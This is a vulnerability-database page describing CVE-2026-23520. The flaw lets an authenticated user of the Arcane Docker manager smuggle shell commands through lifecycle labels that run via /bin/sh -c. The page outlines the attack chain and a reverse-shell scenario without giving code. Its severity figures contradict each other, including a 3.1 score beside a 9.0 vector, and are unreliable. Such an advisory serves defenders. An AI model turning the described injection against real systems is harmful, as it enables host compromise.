What is the CVSS score of CVE-2026-23520?

CVE-2026-23520 has a contested CVSS base score of 9.0 from a third party (e.g. CISA-ADP), while the vendor rates it Critical. vuln.today uses the vendor rating as authoritative.

Which versions of Docker are affected by CVE-2026-23520?

CVE-2026-23520 presents critical security risk, a OS command injection vulnerability rated CVSS 9.0.. A patch is available.

Is there a public PoC exploit available for CVE-2026-23520?

Yes, a public proof-of-concept exploit is available for CVE-2026-23520. Prioritise patching immediately. EPSS: 0.0%.

How to fix or mitigate CVE-2026-23520?

Within 24 hours: Identify all affected systems and apply vendor patches immediately. Validate that input sanitization is in place for all user-controlled parameters.

Docker CVE-2026-23520

CRITICAL

OS Command Injection (CWE-78)

2026-01-15 security-advisories@github.com

GHSA-gjqq-6r35-w3r8

Docker Command Injection Arcane Suse

Critical

Disputed · 9.0 NVD

Severity by source

Sources disagree (Low–Critical)

GitHub Advisory PRIMARY

9.0 CRITICAL

AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

SUSE

3.1 LOW

AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

vuln.today treats the vendor’s rating as authoritative. A higher third-party CVSS (e.g. CISA-ADP) is shown for transparency but does not drive the headline severity.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

Required

Scope

Changed

Confidentiality

High

Integrity

High

Availability

High

Lifecycle Timeline

Patch released

Mar 31, 2026 - 21:13 nvd

Patch available

Analysis Generated

Mar 12, 2026 - 21:54 vuln.today

PoC Detected

Feb 05, 2026 - 21:37 vuln.today

Public exploit code

CVE Published

Jan 15, 2026 - 20:16 nvd

CRITICAL 9.0

DescriptionGitHub Advisory

Arcane provides modern docker management. Prior to 1.13.0, Arcane has a command injection in the updater service. Arcane’s updater service supported lifecycle labels com.getarcaneapp.arcane.lifecycle.pre-update and com.getarcaneapp.arcane.lifecycle.post-update that allowed defining a command to run before or after a container update. The label value is passed directly to /bin/sh -c without sanitization or validation. Because any authenticated user (not limited to administrators) can create projects through the API, an attacker can create a project that specifies one of these lifecycle labels with a malicious command. When an administrator later triggers a container update (either manually or via scheduled update checks), Arcane reads the lifecycle label and executes its value as a shell command inside the container. This vulnerability is fixed in 1.13.0.

AnalysisAI

Arcane Docker management tool before 1.13.0 has command injection in lifecycle labels. Container labels are passed to /bin/sh -c without sanitization, enabling RCE. …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access

Authenticated user creates project via API

Exploit

Set malicious lifecycle label value

Execution

Updater service executes unsanitized command

Impact

Arbitrary code execution on host

Access

Authenticated user creates project via API

Exploit

Set malicious lifecycle label value

Execution

Updater service executes unsanitized command

Impact

Arbitrary code execution on host

Vulnerability AssessmentAI

Exploitation	Authenticated user account required; Arcane updater service must be enabled with lifecycle label processing active; victim must trigger container update operation that invokes pre-update or post-update lifecycle labels. Additional conditions and limiting factors are described in the full assessment.
Risk Assessment	CVSS 9.0 (Critical). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker sets a container label containing a reverse shell command. When Arcane updates the container, the lifecycle hook executes the injected command.
Remediation	Update Arcane. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Identify all affected systems and apply vendor patches immediately. …

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-48039 CRITICAL Act Now POC

9.1 Jun 11

Unauthenticated remote attackers can invoke MCP tool handlers and exfiltrate the operator's long-lived Meta Graph API ac

CVE-2026-53753 CRITICAL Act Now

9.8 Jun 16

Unauthenticated remote code execution in Crawl4AI versions <= 0.8.6 allows attackers to escape the AST-based sandbox in

CVE-2026-47172 CRITICAL Act Now

9.5 Jun 11

Privileged GitHub Actions workflow injection in Quest Bot (Discord moderation bot) prior to version 1.0.3 allows remote

CVE-2026-47174 CRITICAL Act Now

9.5 Jun 11

Production deployment compromise in Duck Site before 1.0.1 allows remote attackers to push attacker-controlled code as t

CVE-2026-53755 HIGH This Week

8.6 Jun 16

Server-side request forgery in Crawl4AI's Docker API server (versions <= 0.8.8) allows unauthenticated remote attackers

Vendor StatusVendor

SUSE

Severity: Low

CVE-2026-23520 vulnerability details – vuln.today

Back

Docker CVE-2026-23520

Severity by source

CVSS VectorGitHub Advisory

Lifecycle Timeline

DescriptionGitHub Advisory

AnalysisAI

Unlock full vulnerability intelligence

Attack ChainAIDerived

Vulnerability AssessmentAI

Recommended ActionAI

More from same product – last 7 days

Vendor StatusVendor

SUSE

Share

External POC / Exploit Code